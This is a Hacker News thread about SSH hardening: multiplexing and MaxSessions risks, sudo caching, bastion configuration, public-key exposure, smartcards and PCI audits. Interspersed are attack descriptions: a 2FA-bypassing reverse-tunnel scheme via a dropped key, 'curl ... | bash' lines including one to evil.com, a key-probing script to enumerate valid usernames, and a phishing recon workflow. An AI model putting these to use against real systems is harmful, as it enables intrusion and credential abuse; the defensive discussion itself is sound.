SSH: Best practices (blog.0xbadc0de.be)
284 points by cujanovic on Feb 7, 2016 | 118 comments

The article didn't mention multiplexing or the MaxSessions default in OpenSSH. The default is 10, which means you authenticate once and all subsequent sessions over that connection happen without authentication and without syslog entries. If you manage secure systems and have 2FA, this allows bypassing both the 2FA and the logging.
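For reference, a sketch of the server-side setting in question (the value of 1 here reflects what some sites reportedly do, not an official recommendation):

```
# /etc/ssh/sshd_config -- sessions allowed per network connection.
# The default is 10; setting it to 1 effectively disables server-side
# session multiplexing, so every login re-authenticates and shows up
# in syslog.
MaxSessions 1
```

Restart sshd after changing this for it to take effect.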

All I have to do is trick your folks into testing a ruby / python / perl / bash script for me that will drop a key on your machine, fire up ssh using that key, and tunnel back to my host. Now I have full control of your secure (banking, government, eCommerce) environment, completely bypassing two-factor authentication. Just one link sent to one of your email distribution lists and up to 10% of your folks will run it.

Combine this with sudo credential caching and now I have root on all of your systems without having to bother finding vulns.

Thx to Prandium for the demo of this simple social engineering exploit.

> All I have to do is trick your folks into testing a ruby / python / perl / bash script for me that will...

...install a rootkit or botnet client regardless of how you've configured ssh.

What does this have to do with ssh at all? The attacker could just as easily set up an outgoing VPN-over-TLS in the same way.

The reason this involves SSH, and is in no way related to the malware example you provided, is that this is not malware and will never be detected as such. Very few things can actually block this, and most of those are either too expensive or disabled by most organizations. It is also only getting worse with time. More and more companies are opening up their firewalls outbound because it makes developers feel warm and fuzzy. No, seriously: people are doing real-time integration and builds, calling third-party sites like GitHub. I can even put my script on GitHub. If I wanted this to persist, I could update your .bashrc or .bash_profile and start my tunnel again in the background (as you).

Another reason this involves SSH is that you already have it. I am not installing anything. I am just dropping a key on your machine and (as you) spawning ssh and a reverse tunnel back to a VM I control. No need for root :-) Now I just leverage your existing multiplexed connections into your development and production environments. Your syslog server will not log me connecting, since I am just leveraging your existing channelized SSH session.

This is leveraging a bad configuration that everyone has in SSH by default. In most cases, the attacker can also leverage the commonly poorly configured sudo as well.
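The sudo half of this can be addressed in /etc/sudoers; a minimal sketch (the exact policy is site-specific):

```
# /etc/sudoers -- disable sudo credential caching so every invocation
# re-prompts for the password. The default cache window is several
# minutes, during which anything running as the user gets free root.
Defaults timestamp_timeout=0
```

Edit this with visudo rather than directly, so a syntax error can't lock you out of sudo.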

If my government would give me legal immunity, I would prove this to you by popping nearly every major company or government office in my country in three weeks or less.

If somebody can get you to run "curl -s evil.com | bash" then you are pwned. They can modify your $PATH and install a key logger and create a reverse shell and upload your ssh private key and forward the reverse connection to anything on your LAN. You have already lost.

Keylogger, perhaps. The multiplexing just makes it trivial to connect to everything with no logging and no authentication. I don't even have to modify the PATH or install a keylogger. I am already several steps beyond that in one move. In other words, no audit trail for the FBI to look into, no need to upload some new application, no need to exploit a vulnerable application (beyond the vulnerability of OpenSSH itself by design).

Perhaps some of the confusion here is that it is assumed ssh keys are in use? In an environment that requires 2FA, keys would not be allowed. People would be using RSA tokens, Duo, Yubikeys, etc. This method bypasses those things.

It also means, anyone using the defaults in OpenSSH is not PCI compliant.

I am not even sure this method of access to development or production environments is illegal, as the user is providing the access and I am not hacking anything, nor am I authenticating to anything. The door is wide open. If this were a game of chess, I would get checkmate in one move.

If this were a game of chess, checkmate is getting arbitrary code to run in the context of the user. If you have an existing ssh process running as the same user then you can attach it with a debugger and inject code into it.


A debugger injecting code into a process under the same context isn't a vulnerability. It's supposed to be able to do that. And OpenSSH is supposed to allow you to multiplex sessions. It's a feature.

The vulnerability is the attacker being able to run arbitrary code as the user.

OpenSSH allowing this behavior by default is in itself the vulnerability.

That's a feature, not a bug. SSH is a power tool; if your users can not be trusted with power tools, it is your responsibility to provide them with something brightly coloured, drool-proof and locked down.

Then how do you exploit it without assuming the ability to execute arbitrary code as the user?

Some time soon I will put something up on github so you can test this methodology. It probably won't be tonight though.

"More and more companies are opening up their firewalls outbound because it makes developers feel warm and fuzzy." - this is the actual issue, and should fail you in the audit: precisely because it is a major vulnerability which can be abused in 10^128 different ways.

Running around screaming "OMG OMG, the tool designed to tunnel over the network can be used to tunnel over the network, TEH SKY IS FALLING!!1!!!" is even somewhat funny in this context.

I don't recall even remotely suggesting the sky is falling. If nobody fixes this, it doesn't affect me. I have Multiplexing disabled everywhere that I care about.

The constant news of companies getting popped is actually quite entertaining. The only thing folks may be concerned about is that if too many companies get popped, there may be some heavy handed legislation that starts to affect people. Even that I am perfectly fine with.

ahem "It also means, anyone using the defaults in OpenSSH is not PCI compliant."

I wouldn't worry. Not every auditor will catch this.

Well, that's security through obscurity: planning to fail an audit if the auditors dig too deep, but betting on a surface-level inspection.

"I am just dropping a key on your machine" - from my point of view, it does not matter whether you're dropping an executable, an SSH key, or Aunt Matilda: you already have the user executing arbitrary code (your distinction between "here, pipe this code into bash, it will execute" and "here, pipe this code into bash, it will save itself to disk and then execute" is pure handwaving).

(you are likewise assuming there are multiplexed connections, which is a great leap - these are off by default)

What you have demonstrated is the simplest possible botnet technique, using SSH as the transport and social engineering as the vector; for some reason, you consider it groundbreaking. Well, it would have been - in 2000.

This didn't exist in 2000. It was created and made default on the server in OpenSSH 5. OpenSSH 5 did not make it into enterprise distros for quite some time.

There are literally tens of thousands of articles telling folks to enable ControlMaster (Multiplexing) on the client to "make ssh faster". You would be hard pressed to find a devops shop that isn't already using ControlMaster in their ssh client config. There are at least a handful of government and financial sites that set MaxSessions to 1 because they understand the risk.
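The client-side recipe those articles recommend looks roughly like the sketch below (paths and timeouts are illustrative); disabling or auditing for it is a matter of flipping ControlMaster back off:

```
# ~/.ssh/config -- the "make ssh faster" recipe many guides suggest.
# With this in place, later ssh/scp/git invocations to the same host
# ride the first connection with no re-authentication.
Host *
    ControlMaster auto
    ControlPath ~/.ssh/cm-%r@%h:%p
    ControlPersist 10m

# To disable multiplexing instead:
#   ControlMaster no
# To check whether a live master connection to a host exists:
#   ssh -O check user@host
```

ControlPersist keeps the master connection open in the background after the first session exits, which is exactly the window the attack above rides on.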

This specific mechanism didn't exist in 2000; the behavior is no different from the ILOVEYOU virus: user runs code, code does something malicious, code contacts cracker.

It all boils down to "if you require security, you can't have a default-open environment"; blaming a specific tool seems ... strange.

Strange as it may be, this virus will never be detected as a virus. That is why I am blaming the default settings in the tool.

so... your point is "don't run untrusted code"?

You would think that is common sense, right? :-) I so wish more people thought like you.

Get permission from your privacy and legal team before you do this of course. Write a small script in whatever language you like. Encode a ... gosh, don't even get that fancy. Just email them something silly from an external email address like:

    curl -s https://tinyvpn.org/ | bash
Listen for how many Mac users around you in your company suddenly start saying, "How do I stop this??" That one is meant for people who don't lock their computers, but the same applies.

"Don't run untrusted code" has been a basic common sense for people since the dawn of the internet, but that doesn't mean you can follow it 100% of the time. It's good to be aware of potential attack vectors, and not just sweep them under the rug of "don't be an idiot".

You run untrusted code whenever your browser loads a web page that uses javascript. With more and more of the web requiring javascript to work, running untrusted code becomes less and less a real option if you want to get any work done.

Arguably, plain HTML is also untrusted code, and I certainly don't trust every single one of the authors of my operating system and all of the os-level utilities and all the applications that I use, especially not Microsoft or Apple. But I'm forced to use them for work.

A year or two ago there was some hoopla about Canonical collecting some information about Ubuntu's users or something like that (don't remember exactly) and a lot of people were up in arms about how they don't trust Canonical. Canonical's reply was one of the most insightful I've ever read on the internet. They said something like, "um... but we've got root".

That's a great point. The makers of your OS, the builders of your apps, they have a lot of power over you that you grant them simply by using their stuff. You're effectively trusting them, even if you don't trust them.

You could react by not using anything that anyone you don't trust writes, or by thoroughly auditing all the source code of everything you use (you do use only open-source software which can be audited by you directly, right?). But this is not really practical for 99% of everyone on the planet.

> They said something like, "um... but we've got root".

Which is incredibly misleading.

Sure, they could put malicious code in their distribution. It could do whatever they want. And then it would be on your machine, where you can potentially discover it and publish what you've discovered and allow others to verify your discovery. Which could cause Canonical to not have root anymore, because people would immediately switch to Debian or CentOS or something else.

But if they send data from your machine to their servers, no one has any ability to determine what they do with it from there, how well they secure it, who they give or sell it to, etc. It's a completely different situation because it goes from trust-but-verify to blind trust.

How many Ubuntu users actually verify everything Canonical sends them? I'd say very close to none, especially for the binaries.

Sure, in principle you could verify. You could read through all the source, you could even disassemble the binaries and read through the assembly (and don't forget to verify the hardware too). Again, who actually does that? Virtually no one.

So the two cases are a lot closer than you paint them to be.

Also, corporations do stupid, illegal, and unethical stuff all the time, even when it's clearly (especially in hindsight) not in their long-term interest to do so. Even when it will clearly destroy their reputation if the public found out they even considered it.

Even if you trust "the system" (which is more of a hope that if there's something malicious, someone out there will detect it sooner or later), there are many cases of vulnerabilities in even open source code going undetected for years... nevermind vulnerabilities in binaries that you don't have code for and who the authors of aren't generous enough to clue you in on.

Canonical (or whatever source you actually get your OS or apps from) could also send you some specially crafted something that no one else gets. Now who's going to verify it for you if you don't do it yourself? How are you ever going to find out, if you're not one of the ultra-paranoid and super-skilled 0.001% of Ubuntu users with infinite time and determination who actually verifies 100% of what Canonical sends them? You just won't. And if you did, there'd be a hundred new Ubuntu versions out by the time you finished verifying even one of them.

People trust, but they very rarely verify. The size of operating systems and applications and the skill to verify have all just grown too large to make it practical for the overwhelming majority of people.

I do see your point about Canonical doing whatever they want with the data they collect. That's certainly problematic. But that doesn't mean that there aren't major privacy or security issues with trusting Ubuntu (or any other OS) not to have malware on it.

> Virtually no one.

Which is not the same thing as no one. And it only takes once to ruin your reputation forever (see also Sourceforge, Lenovo, etc.) Moreover, the probability of detection doesn't have to be very high at all because the cost to Canonical would be catastrophic, so any possibility whatsoever acts as a deterrent. And more so in this context because of the nature of the user base.

Your argument seems to boil down to the position that it doesn't hurt anything to go from detection not perfect to detection not possible.

Developer laptop compromise is probably the biggest security risk that any startup company faces, because the developer laptop is an uncontrolled environment with a lot of "attack surface" which may have been previously compromised.

In my view there are emerging best practices in this area. There are two ways to reduce this risk and both are controversial:

1. Force developers to develop software only over an SSH terminal (by first connecting to a developer VPN via 2FA and then sshing into their secure development environment, where they may use tools like tmux, vi, and their programming language of choice to get the job done). In this scheme, copying source code or security credentials to a developer laptop is considered a violation and becomes a fireable offense, no questions asked.

2. Require all developers to run a private USB-bootable Linux desktop shell which is known to be clean. In this case they remain free to use modern desktop editors and emulators (such as the Android emulator). It's even possible to set up secure persistence in these environments so that the developer's browser configuration, network/VPN config, dotfiles, apt installs, etc. are stored on an encrypted filesystem on the USB device. The reason a USB image is preferred is that it's annoying to ask a new employee to repartition her personal hard drive.

My suspicion is that as more of the tools developers rely on become cloud-based (for example: GitHub, Cloud9, Jenkins), we will eventually see these modern best practices against client-side attacks adopted more broadly. The quality and reliability of hot-bootable, ultra-secure cloud operating systems has gone through the roof over the past couple of years, and I assume this trend will only accelerate given that Google Chrome OS continues to penetrate more of the market and consumers are getting used to it.

TLDR: ssh keys sitting on developer hard drives are an info-sec anti-pattern; they should only ever exist in system memory or in an encrypted partition on a USB stick.

(Disclaimer, unicorn employee.) I'm confused. Are you implying people write company code on personally owned laptops? That's insane!

1. Company walks you through setting up FileVault (with key escrow) and VPN client, generating and uploading SSH public key immediately after unboxing laptop.

2. OneLogin + Duo (or pick your SSO/2FA scheme) for everything - internal webapps, GMail, etc.

3. SSH keys managed by Puppet.

4. 2FA verification of SSH logins (using pam-interactive), through a bastion (provided .ssh file makes it transparent), with OSX's default SSH agent, with pretty much all of those best practices configured except smartcards/certs.

5. Engineers have SSH access only to utility/development boxes. You can deploy code to production through a webapp (identifying the commit ID) but you can't get a shell as your application's user, and certainly not root.

6. Webapps moving behind a VPN.

In the rare case that you need to debug in production beyond what you can get from metrics/logs, you pair with a "blessed"/senior sysadmin type.

Thank you for this. I suppose I should have included the caveat that my rant applies mostly to early-stage shops which aren't ready to build out and ship a shiny new dev machine for every employee. Another problem for smaller startups is that if you're not careful, almost everybody ends up being "blessed". And simply being a senior sysadmin type doesn't mean that you're automatically immune to all forms of social engineering attacks. I suppose your point is that even very early companies should opt for standardized hardware; I think you're right.

I <3 Duo Security.

If you are using an ssh agent, it is a good idea to delete the keys when you lock the screen or sleep your laptop. On Mac OS X you can do this with Hammerspoon: http://fanf.livejournal.com/139925.html
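The non-Hammerspoon core of that is just clearing the agent; a minimal sketch (how you wire it to the lock/sleep event is platform-specific):

```shell
#!/bin/sh
# Drop all identities from the running ssh-agent, if one is reachable.
# Intended to be triggered by a screen-lock or sleep hook (e.g.
# Hammerspoon on OS X, or xss-lock on Linux).
clear_agent_keys() {
    if [ -n "$SSH_AUTH_SOCK" ] && ssh-add -l >/dev/null 2>&1; then
        # Agent is reachable and holds at least one identity.
        ssh-add -D
    else
        echo "no reachable ssh-agent; nothing to clear"
    fi
}

clear_agent_keys
```

If you use `ssh-add -t <seconds>` when loading keys, they also expire on their own, which limits the window even when you forget to lock.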

3. Never grant direct SSH access to the staging/production environment.

Automate the build and deployment environment on a system that developers don't have direct access to. Instead of pushing changes, the bot pulls a specified release branch, builds, tests, and deploys the code. All without human interaction.

If malicious code were somehow introduced from a developer's environment, it would be recorded and reflected in the commit history.

AFAIK, that's how GitHub manages deployments via HubBot. See https://www.youtube.com/watch?v=NST3u-GjjFw.


To take things a step further, public-facing environments should be made immutable wherever possible, with the entire system being built and released as a whole. Docker alleviates some of the complexity and overhead, but I think this space is where unikernels have a lot of potential to shine.

There's a very good talk here about how the Wunderlist team used chaos and frequent destruction of their environments to overcome fear and uncertainty: https://www.youtube.com/watch?v=RrX_28s70ww&app=desktop.

Emphasis being placed on the frequent disposal and recreation of environments rather than on building long-running persistent environments.

This setup probably won't work for long-lived systems (e.g. databases). In those cases, access via a transient environment like a USB-bootable OS would be ideal to prevent persistent viruses/trojans. Ironically, the best current options are security-focused distros like Kali Linux that put a special emphasis on avoiding persistent state. Maybe one day soon we'll see an admin-focused OS that better fits this role.

> 3. Never grant direct SSH access to the staging/production environment.

Most complex systems fail in unexpected ways, and the best way to debug is to grant the devs access to production machines. It can be temporary, monitored and through a secure channel, but it's still something most organizations can hardly live without.

I think this issue is potentially moot if you've transitioned to immutable deploys. Under such a system, triage steps would tend to change from the standard approach of having an SA/dev ssh in and muck around until the issue is found. Instead, the first step might be simply redeploying (in case of transient/intermittent issues that are disrupting service), and then checking out the production system locally to do root cause analysis.

So yeah, most organizations couldn't do this today, because they don't have the deploy process in place. But when an organization has made the switch, then it is much more realistic to assume that it can get along without granting ad hoc ssh access to production systems.

Exactly. It's also possible to capture stack traces remotely from a running system and/or after a crash. http://techblog.netflix.com/2015/12/debugging-nodejs-in-prod....

Hopefully, this practice -- and the tools required to make it happen -- get better with time.

> Developer laptop compromise is probably the biggest security risk that any startup company faces, because the developer laptop is an uncontrolled environment with a lot of "attack surface" which may have been previously compromised.

It's also the least likely to happen. Attackers will have broken deep into your database due to poor webapp security before getting a hold of your ssh private key.

Not that SSH security doesn't matter. It's easy enough and carries enough risks that putting some effort into it is worthwhile.

I think that unfortunately you're mistaken. If all you do is sit and look at log files all day you can come off with this impression because you see so many scans go by, but that creates a bias in your thinking which doesn't line up with the facts.

A motivated attacker will always tend to try the "low tech" approaches first to rule them out, because they don't require as much sophisticated technical attention, and it's a well-known fact that human beings are more often than not the weakest link in the chain of security.

It goes something like this:

1. Enumerate the employees: build a list of all their work emails and try to obtain their personal emails and those of their spouses and children.

2. Investigate the background of executives so that a compelling phishing email can be crafted which looks like it originated from high up within the organization.

3. Send targeted phishing emails designed to bait people within the organization to visit webpages that exploit Adobe Flash attack vectors or other browser based vulnerabilities, or perhaps even lure them into installing a trojan directly.

4. After someone in the organization falls victim to the client-side attack, read their emails to learn more about the organization's structure so that your next phishing attack can be more refined, specific, and compelling, and can possibly utilize a real corporate email address.

5. Rinse and repeat until you eventually gain access to a developer laptop where you can grab production environment SSH keys. Now you own the network without even having to scan a single server and without leaving a trace in the log files.

You're describing the workflow of an APT attack. Those are extremely costly, take several months to complete and definitely involve highly technical skills. I agree they are a real threat, but not to startups, to Fortune 500 companies.

For startups, the #1 risk is a vulnerability in some web app, or a forgotten admin panel, that leaks the entire database to an attacker. Not a complex attack conducted by a nation-sponsored offensive team.

But again, SSH security matters, you should take it seriously.

I think that "APT" is just a fancy new word that describes a very old methodology that has been commonplace since the earliest days of computer crime. If you read about Kevin Mitnick for example he was doing this stuff in his early teens.

I think you may have a dangerous attitude about it, because in modern times it's not a question of whether you're a big enterprise or a startup; it's a question of whether the dataset at the nucleus of your system would be valuable on the black market. If an attacker or group of attackers thinks your dataset could be saleable one day as your company continues to grow, then instead of trying to buy your equity on the secondary markets, they may invest in trying to "own" your infrastructure now, before you become big enough to put your employees through white-hat training around social engineering.

I suppose my point here is that it does make sense for startups to put their team through proper white-hat training, and it doesn't have to be expensive because you can roll your own. What I suspect is that in 10 years or so this kind of anti-social-engineering training will be standard for all IT knowledge workers, not just programmers, and will likely be part of the job interview process.

We are arguing over something moot, though, since we both agree: take it seriously.

It's all a matter of prioritization. In an ideal world, address all the issues and be perfectly secure. But if you have to choose by priorities, private ssh key compromise is not exactly at the top of my concerns because people are generally careful about their keys.

I argue that a leaked SSH key is not the worst nightmare, but it's definitely in the top five on anyone's list. I am more worried about source code and database leaks through the development cycle: production data copied to dev environments, and source code cloned to laptops. How do Google/Facebook handle this? I can't imagine anyone cloning their 30GB (or whatever size) single-branch repository down to a laptop (they may do shallow clones, but that doesn't matter).

yeah - the link seems to be hugged to death or something

I just noticed this an hour ago. Bad config on the server and too little ram. The link should work better now.

The part about gateway hosts says:

  > Host B
  >   ProxyCommand ssh -W B:22 A
That could be improved:

  > Host B
  >   ProxyCommand ssh -W %h:%p A
Then you can use wildcards for B ("Host 10.11.12.*"), and use custom ports ("ssh -p 2222").
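Putting the suggestion together, a sketch of a wildcard bastion setup (the gateway name "A" and the address range are placeholders from the example above):

```
# ~/.ssh/config -- jump through gateway "A" to anything on 10.11.12.0/24.
# %h and %p expand to the requested host and port, so non-standard
# ports ("ssh -p 2222 10.11.12.5") work without extra stanzas.
Host 10.11.12.*
    ProxyCommand ssh -W %h:%p A
```

On recent OpenSSH clients, `ProxyJump A` (or `ssh -J A target`) is a shorter way to express the same thing.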

I thought using per-service SSH keys was a useful mitigation against e.g. GitHub public keys being exposed:

- https://blog.benjojo.co.uk/post/auditing-github-users-keys

- http://arstechnica.com/security/2015/06/assume-your-github-a...

- https://news.ycombinator.com/item?id=9645703

Public keys being exposed isn't something I think needs to be mitigated. That's the whole point, they're public.

Security is not binary. In this case it depends on whether disclosing your identity to the servers you connect to is a problem in your threat model.

Saying "they are public so it's ok" is technical oversimplification.

It's not binary, but if your security depends on your public key being secret, something else must be wrong. It's the same as someone who depends on their IP addresses being secret. That's not something you can count on, and your security would be better served by designing your infrastructure with the assumption that it's totally public information.

> public key

The word "public" is just a name for a kind of key defined in the field of cryptography and doesn't necessarily hold the same connotation in application protocols that use public-key cryptography. One example would be an ephemeral public key that has to be kept private to retain forward secrecy (although in such schemes DH is usually used).

Consider as well this situation, which is closer to SSH. Suppose you are an MS dev working on the NT kernel who by night also wants to anonymously contribute to Linux. Obviously both camps would rather you didn't, for fear of copyright infringement, but OpenSSH shouldn't betray the anonymity you could reasonably expect. It's imaginable that only one public key pair would be needed, to authenticate the server, if password authentication is used for the client. The user doesn't expect the client software to silently generate a key pair, much less that the same pair is used for every domain, because the pair is not strictly needed. Although users should inform themselves about how the software works, good software similarly shouldn't behave in ways that are reasonably unexpected to people familiar with the domain. Ideally, if the OpenSSH developers can't foresee it working any other way, OpenSSH should at least explicitly inform the user which public key will be used in a connection before it is established, in order not to assume the consent of poorly informed users.

> Saying "they are public so it's ok" is technical oversimplification.

It's not. The whole idea of the scheme is that you can publish them everywhere with no risk.

In case of Bitcoin pubkeys you don't want to publish them anywhere for privacy reasons (that turn into real physical security reasons once you have enough BTC). Also, notice how pubkeys are normally hidden under hashes and revealed only at spending time. This drastically limits attacks on ECC if/when some weakness in curve math is discovered. And if quantum computer is invented tomorrow, people can safely transition funds to a new signature scheme by introducing 2-phase commitments to safely reveal (now crackable) ECDSA pubkey after another transaction was made with commitment to concrete signature (preventing double-spend attempts using a cracked key).

OMG, people! "Public" in "public key" doesn't mean that you should share it with the whole world, it's just because it's an antonym of "private key", meaning that the other party you want to communicate with doesn't need to have a pre-shared secret key with you. Other party may be the whole world, but may be not. How public key is used is up to a protocol and threat model: it may as well be secret, and yes, in some protocols and threat models security can depend on public key being secret, and it's not wrong, and not "security by obscurity".

"Could be known to an attacker" is not the same as "is known to an attacker". Certainly, the more determined your attacker is, the more those two converge, and thus you should treat them as indistinguishable when defending against determined attackers. But by publishing all users' public SSH keys, GitHub has made the "could be known" into "known" for even casual attackers.

Well, it's not necessary (or even good) to have a Single Master Ssh Key For Everything, right? ;)

Exposing shared public keys creates an information leak; it allows attackers to probe for valid and usable username/key combinations on your servers (and thereby discover valid usernames). This may be a trivial information leak or it may be one that you consider important; it depends on the situation.

Not sharing public keys between different services and contexts (eg not using your Github keys for anything else) mitigates this risk significantly.
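A sketch of the per-service layout (key file names and host patterns are illustrative): IdentitiesOnly stops the client from offering every key it knows about to every server, which is the behavior that makes cross-service correlation possible.

```
# ~/.ssh/config -- one key per service, never offered elsewhere.
# Generate each key with e.g.: ssh-keygen -t ed25519 -f ~/.ssh/id_github
Host github.com
    IdentityFile ~/.ssh/id_github
    IdentitiesOnly yes

Host *.internal.example.com
    IdentityFile ~/.ssh/id_work
    IdentitiesOnly yes
```

Without IdentitiesOnly, the client will still offer any keys loaded in the agent, defeating the separation.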

> Exposing shared public keys creates an information leak; it allows attackers to probe for valid and usable username/key combinations on your servers (and thereby discover valid usernames).

How? That's not how public key auth works...

> Not sharing public keys between different services and contexts (eg not using your Github keys for anything else) mitigates this risk significantly.

This is true for other reasons, and you can automate it with some shell scripts.

It's how the SSH protocol itself works. When the client connects to a server, it sends the (remote) username and then a series of public keys. If the server will accept the current public key, it asks the client to authenticate with that key to show that you hold the private key; if it doesn't, it says 'try again'.

This means that a malicious client with just the public key can probe to see if a server will accept a given username/public key combo. If the server does, it will challenge you to authenticate that you hold the private key (which you'll have to fail, since you don't have it).
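A sketch of what such a probe could look like from the client side; the target, username, and key file below are all placeholders, and it assumes a reasonably recent OpenSSH client (which accepts a .pub file for -i). The string "Server accepts key" in the debug output indicates the username/key combination is authorized.

```shell
#!/bin/sh
# Probe whether a username/public-key pair is authorized on a server,
# using only the public half of the key. If the server would accept
# the pair, the -v debug stream contains "Server accepts key"; the
# authentication itself then fails, since we lack the private half.
# All three values are placeholders.
target=203.0.113.10      # TEST-NET address; substitute the real host
user=deploy              # guessed or harvested username
pubkey=./harvested.pub   # e.g. fetched from https://github.com/<user>.keys

ssh -v -o BatchMode=yes -o ConnectTimeout=3 \
    -o StrictHostKeyChecking=no -o IdentitiesOnly=yes \
    -i "$pubkey" "$user@$target" true 2>&1 |
    grep -c "Server accepts key" || true
```

The output is simply the number of accepted-key lines seen: 0 means the combination was rejected (or the host was unreachable), 1 or more means it is valid.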

> It's how the SSH protocol itself works. When the client connects to a server, it sends the (remote) username and then a series of public keys.

Well that's an ... interesting (read: stupid) design choice. I get that it reduces load on the server, but how many public keys is one user likely to have? Surely you could do something with ring signatures to make it not even require knowing which key was used?

I think if you consider leaking usernames to be an important risk, there is probably some other problem. Your username can probably be easily guessed based on your email address or first and last name anyway.

My point is you are better off designing things assuming that usernames and public keys are public information. That doesn't mean you have to go publish them on your website, but you also don't need to worry about mitigating it if someone else does.

Here's a brief guide for setting up SSH with YubiKey as a smartcard which complements this article nicely - https://github.com/drduh/YubiKey-Guide

Thanks for the link! I wish this was a little bit easier though. One of my coworkers still prefers a password list in notepad vs key-based authentication. This looks quite complicated.

Looks like I'd need to configure gpg to use it locally first.

One of the main uses of smartcards is to use it on other machines (eg: not mine). What's the added benefit of adding one if I'm logging in from my local machine?

For what it's worth, most smartcard applets don't typically store GPG objects but RSA keys (and also usually X.509 certificate objects that go along with them, as well as less-used RSA public key objects).

I use PIV (NIST SP 800-73) compliant smartcards with a PKCS#11 module I wrote (CACKey), it just works with "ssh-add -s /path/to/libcackey.so", then SSH away.

Additionally, there is a fork of OpenSSH called PKIXSSH that adds X.509 certificate support (in addition to the relatively recent, compared to the fork, support for OpenSSH certificates) and then I can authenticate to remote systems using my certificate -- which is helpful when my card is replaced, or if my certificate is revoked the CRLs can be used.

Good advice, except the "remove all system passwords" part. Do not do this. It's a really bad idea. There are occasions where you do need to authenticate using a password, most importantly on the local console - what if your server lost network access?

And that sudo workaround is bad since it requires agent key forwarding, which you shouldn't use for the reasons the author himself noted a few paragraphs up.

Weird, where I work we're not allowed to use key auth. They claim it's for PCI since they can't enforce that the keys are passworded/encrypted.

They are correct. You can't enforce passphrases on SSH keys at all, nor can you enforce key rotation unless you have a system that issues both the public and private keys. Even then, the user can simply re-save the private key without a passphrase. SSH keys used correctly can be more secure than 2FA, but I have yet to see anyone actually use them correctly. If you are honest with yourself, you know that most of the folks in your org don't have passphrases on their SSH keys. It is easy enough to test if you have something managing their laptops.
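To illustrate why it can't be enforced client-side: stripping a passphrase is one command. A throwaway demo (key names and passphrase invented for the example):

```shell
# Work in a scratch directory with throwaway keys.
cd "$(mktemp -d)"

# Generate a key "protected" by a passphrase...
ssh-keygen -t ed25519 -f demo_key -N 'hunter2' -q

# ...which the key holder can remove whenever they like:
ssh-keygen -p -f demo_key -P 'hunter2' -N ''

# The private key now loads with no passphrase at all.
ssh-keygen -y -f demo_key
```

Nothing on the server side can tell the difference afterwards.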

Ironically, things done for PCI/ISO27K compliance very often decrease security. Maybe not always, maybe not everywhere, but at least that's my experience with the companies I worked at and is also in line with the stories I heard about other companies.

Quite recently: Security was concerned about enforcing ssh key rotation and was pushing for sysops to generate and store (obviously - unencrypted) private keys for all users on a central jump host and provide users access to that host using passwords (for which enforcing lifecycle policies is easier).

I agree with that. Folks are forced to create little isolated environments that are less likely to be patched or monitored, for fear of bringing more systems into PCI scope.

That is slowly starting to change, however. PCI DSS 3.0 gets a bit more specific and starts to go down some technical rabbit holes. PCI DSS 4.0 will be even more specific and have more technical requirements (vs. checkboxes).

That's an odd tradeoff. I'm going to have to disagree with the sibling noting that "compliance != security".

Here's the thing: they say they can't force users to encrypt their keys (hogwash; you can have a local agent that checks that), but do they check that users are providing good passwords? I have much more faith in a randomly generated key than I do in a human-generated password. The former pretty much requires compromising the machine; the latter I can just take pot-shots at the server with. (They do rate limit your SSH password attempts, right? right?)

Even if we assume that the password is good, and that the server won't allow infinite tries to guess it, the security is only equivalent: compromise of the user's local account will reveal the password (just sniff the password) or the key (just read the keyfile, and sniff the password if it is encrypted). I don't see any world in which a password is more secure than a key.

The parent comment is discussing encryption of the private key with a password, not passwords for connecting to the server.

The parent is discussing both, and I am too; specifically, the parent says,

> we're not allowed to use key auth.

i.e., they're using password based auth.¹ The point of my post is that while certainly users leaving the private key unencrypted isn't good, trading that for password auth leaves you in a worse state overall (IMO).

¹Of course, they could be using an auth scheme that is neither password nor key based. But given that the parent didn't come out and say that, my gut says that's not the case here.

You could require both pubkey + password:
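With the AuthenticationMethods directive (OpenSSH 6.2 and later), e.g.:

    # sshd_config: both methods must succeed, in the order listed
    AuthenticationMethods publickey,password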


I believe this was attempted, but they were running an older version of OpenSSH that was only getting security patches. OTP was not being triggered if an SSH key was used, so it was either password + OTP or SSH key alone. They opted to disable SSH key auth as the solution.

There's nothing in PCI which prevents the use of SSH keys. In no scenario is password auth more secure than key auth.

There is a step where the auditor will observe you entering a correct and an incorrect password to enter the systems. If your org is depending on SSH key passphrases for this step and you get the wrong person in front of the auditor (the one without the passphrase on their key) then you just failed the audit. The more steps you fail, the deeper down the rabbit holes they go with each step. If they see you are not failing, it will be a check-box exercise. Each auditor is a little different of course; but generally speaking, this is true.

What happens if an ssh agent is used? pageant requests the passphrase and then leaves the key unlocked. Or is this audit step set up so I can remove the key from my agent and then demonstrate that I need a proper password to get in?

Compliance has very little to do with actual security unfortunately...

I've worked with an organisation with the following rules.

A user wants to write an SQL query. The user writes it in notepad or whatever, and saves it in a .sql file. The user then will right click on this file they just created, and hit "Scan with McAfee antivirus". If the .sql file they just created comes up clean, they can then open it in SQL Manager and execute it. If they want to then adjust the query, they have to close the file and start over, running the scan again. People can and have been fired over getting lazy about that process.

There's a security consultant with a clipboard who firmly believes this improves security.

I facepalmed so hard my forehead hurts

The same link is somewhere in this guide, too. This guide has a broader scope, though.

Also, move sshd to a random & rarely-used TCP port. It won't help much against a skilled & determined targeted attack, but this bit of "security through obscurity" is not entirely worthless: using something other than 22 is quite effective at avoiding spray-n-pray scans and exploits.
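e.g. in sshd_config (port number picked arbitrarily):

    # Remember to allow the new port through the firewall before restarting sshd
    Port 2849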

For extra credit, set up port knocking.

Choosing to bind SSH only to a VPN interface is another option. If you can use a VPN that incorporates 2FA, that's even better. Projects such as ZeroTier are going a long way towards making this kind of thing easier to set up.

Then the VPN breaks, and you're out of luck.

SSH's new AuthenticationMethods directive is extremely useful for pairing SSH keys with a password and/or 2FA. You should absolutely use keys everywhere, and encourage your users to encrypt their keys, but enforcing a password as well ensures that logins are "something you have" (the SSH key) and "something you know" (the password) as a sort of 2FA.
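A sshd_config sketch of that (comma-joined methods must all succeed, in order; space-separated lists are alternatives, any one of which suffices):

    # Require key+password, or key plus a keyboard-interactive (e.g. PAM 2FA) prompt
    AuthenticationMethods publickey,password publickey,keyboard-interactive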

As a cherry on top you can put the password in LDAP or RADIUS server and hook up traditional 2FA (Google Auth, Yubikey, Email, SMS) for that legendary 3FA (ah... "something (else) you have"). Sounds hokey, but defense is best in depth.

Something you have plus two things you know does not turn 2FA into 3FA. It's still 2FA - it's just several things you know instead of one.

3FA is:

* Something you have (normally one OR MORE user IDs)

* Something you know (normally the associated password or passwords for the user ID(s))

* Something you are (normally biometric)

[edit: technically, it's multi-factor when using multiple user/passwords - here's a useful link https://pciguru.wordpress.com/2010/05/01/one-two-and-three-f...]

